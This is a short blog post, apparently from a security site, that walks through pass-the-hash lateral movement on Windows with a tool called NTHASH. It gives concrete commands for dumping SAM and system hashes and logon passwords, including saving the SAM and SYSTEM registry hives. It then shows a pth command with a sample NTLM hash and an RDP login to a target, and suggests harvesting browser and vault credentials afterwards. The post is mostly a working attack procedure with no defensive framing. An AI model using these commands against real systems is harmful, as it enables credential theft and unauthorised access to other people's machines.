Oct 282019
 

Following previous article on NTHASH, lets see how to perform lateral movement using « pass the hash » (pth).

In 3 steps, lets retrieve some hashes and then lets perform a PTH (using MS RDP client).

1.Retrieve the hash
NTHASH-win64.exe /dumpsam
or
NTHASH-win64.exe /dumphashes /system
or
reg save hklm\sam sam.sav and reg save hklm\system system.sav
NTHASH-win64.exe /dumphashes /offline
or (in a domain env)
NTHASH-win64.exe /logonpasswords

2.Pass the hash
NTHASH-win64.exe /pth /user:username /password:8846F7EAEE8FB117AD06BDD830B7586C /domain:.

3.In the newly opened cmd « pth » shell, type mstsc /restrictedadmin /v:target

You will end up logged as the « username » account in a RDP console on server named « target ».

Try a simple whoami for fun and go back to credential harvesting for this account using /firefox, /chrome, /enumvault, /enumcred, etc.

And you never had to enter the « username » password…

Note that any other client tool (preferably built in windows) that inherit ntlm credentials from current logon session will work too (tasklist/taskkill, wmic, net, winrm/powershell, psexec, etc)

This will be covered in future articles.

Poster un Commentaire

avatar

Ce site utilise Akismet pour réduire les indésirables. En savoir plus sur comment les données de vos commentaires sont utilisées.

  S’abonner  
Notifier de